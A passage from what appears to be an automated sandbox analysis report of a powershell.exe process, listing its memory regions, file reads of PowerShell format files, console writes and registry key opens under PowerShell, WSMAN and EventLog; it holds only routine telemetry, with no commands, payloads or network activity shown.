| sortdefault.nls | 0x01f90000 | 0x0225efff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000002260000 | 0x02260000 | 0x02652fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002660000 | 0x02660000 | 0x0275ffff | Private Memory | rw |
|
|
|
- |
| sortkey.nlp | 0x02760000 | 0x027a0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000027b0000 | 0x027b0000 | 0x027effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000027f0000 | 0x027f0000 | 0x0288ffff | Private Memory | rw |
|
|
|
- |
| system.transactions.dll | 0x02890000 | 0x028d2fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000028e0000 | 0x028e0000 | 0x0291ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002980000 | 0x02980000 | 0x029bffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x029c0000 | 0x02a7ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000002a80000 | 0x02a80000 | 0x02abffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002af0000 | 0x02af0000 | 0x02b2ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000002b30000 | 0x02b30000 | 0x04b2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b30000 | 0x04b30000 | 0x04b6ffff | Private Memory | rw |
|
|
|
- |
| system.management.automation.dll | 0x04b70000 | 0x04e51fff | Memory Mapped File | rwx |
|
|
|
- |
| powershell.exe | 0x221c0000 | 0x22231fff | Memory Mapped File | rwx |
|
|
|
- |
| system.transactions.dll | 0x67aa0000 | 0x67ae2fff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.automation.ni.dll | 0x71790000 | 0x72009fff | Memory Mapped File | rwx |
|
|
|
- |
| system.ni.dll | 0x72010000 | 0x727abfff | Memory Mapped File | rwx |
|
|
|
- |
| mscorlib.ni.dll | 0x727b0000 | 0x732a7fff | Memory Mapped File | rwx |
|
|
|
- |
| mscorwks.dll | 0x732b0000 | 0x7385afff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.automation.dll | 0x73a30000 | 0x73d11fff | Memory Mapped File | rwx |
|
|
|
- |
| system.transactions.ni.dll | 0x74220000 | 0x742bbfff | Memory Mapped File | rwx |
|
|
|
- |
| system.core.ni.dll | 0x742c0000 | 0x744f4fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.wsman.management.ni.dll | 0x74740000 | 0x747c4fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcr80.dll | 0x747d0000 | 0x7486afff | Memory Mapped File | rwx |
|
|
|
- |
| mscoreei.dll | 0x74870000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| slc.dll | 0x748f0000 | 0x748f9fff | Memory Mapped File | rwx |
|
|
|
- |
| cscapi.dll | 0x74900000 | 0x7490afff | Memory Mapped File | rwx |
|
|
|
- |
| srvcli.dll | 0x74910000 | 0x74928fff | Memory Mapped File | rwx |
|
|
|
- |
| ntshrui.dll | 0x74930000 | 0x7499ffff | Memory Mapped File | rwx |
|
|
|
- |
| linkinfo.dll | 0x749a0000 | 0x749a8fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x749c0000 | 0x749fafff | Memory Mapped File | rwx |
|
|
|
- |
| shdocvw.dll | 0x74a00000 | 0x74a2dfff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x74a20000 | 0x74a28fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x74a30000 | 0x74a7bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74a80000 | 0x74aa0fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x74ab0000 | 0x74ba4fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x74bb0000 | 0x74bc5fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74bd0000 | 0x74d6dfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x74d70000 | 0x74d7afff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x74d80000 | 0x74d96fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoree.dll | 0x74da0000 | 0x74de9fff | Memory Mapped File | rwx |
|
|
|
- |
| system.configuration.install.ni.dll | 0x74e10000 | 0x74e34fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.diagnostics.ni.dll | 0x74e50000 | 0x74e9afff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.consolehost.ni.dll | 0x74ea0000 | 0x74f20fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x75050000 | 0x750cffff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x750d0000 | 0x7512bfff | Memory Mapped File | rwx |
|
|
|
- |
| atl.dll | 0x75220000 | 0x75233fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75240000 | 0x7527efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752b0000 | 0x752b7fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75310000 | 0x7531bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75320000 | 0x7537ffff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x75380000 | 0x75384fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75390000 | 0x7542ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75430000 | 0x754fbfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x75510000 | 0x75519fff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x75520000 | 0x75531fff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x75540000 | 0x755cefff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x755d0000 | 0x7565ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x75660000 | 0x756b6fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x758f0000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759f0000 | 0x75a08fff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x75b10000 | 0x75b54fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75b60000 | 0x75bfcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75c00000 | 0x75cabfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75cb0000 | 0x75d0ffff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x75d70000 | 0x75f0cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x76110000 | 0x76155fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x76160000 | 0x762bbfff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x762c0000 | 0x762e6fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76380000 | 0x7647ffff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x764b0000 | 0x76532fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76540000 | 0x7664ffff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x76770000 | 0x773b9fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000773c0000 | 0x773c0000 | 0x774defff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000774e0000 | 0x774e0000 | 0x775d9fff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x775e0000 | 0x77788fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x777c0000 | 0x7793ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efa7000 | 0x7efa7000 | 0x7efa9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
|
For performance reasons, the remaining 49 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Host Behavior
File (394)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
2 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
6 | |
| Get Info | C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.config | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0 | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Users\aETAdzjz | type = file_attributes |
|
1 | |
| Get Info | C:\ | type = file_attributes |
|
6 | |
| Get Info | C:\Windows\system32 | type = file_attributes |
|
7 | |
| Get Info | C:\Windows | type = file_attributes |
|
4 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\Documents\WindowsPowerShell\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 4096 |
|
3 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 3315 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 781, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 4096 |
|
41 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 436 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 2530 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 542, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4096 |
|
5 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4018 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 78, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 2762 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 310, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 4096 |
|
17 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 3022 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 50, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 281 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 4096 |
|
62 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 3895 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 201, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 4096, size_out = 4096 |
|
21 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 4096, size_out = 3687 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 409, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 4096, size_out = 4096 |
|
4 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 4096, size_out = 2228 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 844, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 4096, size_out = 4096 |
|
4 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 4096, size_out = 3736 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 360, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Write | CONOUT$ | size = 79 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 79 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 62 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 17 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 57 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 79 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 25 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 54 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
2 |
Registry (188)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
6 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
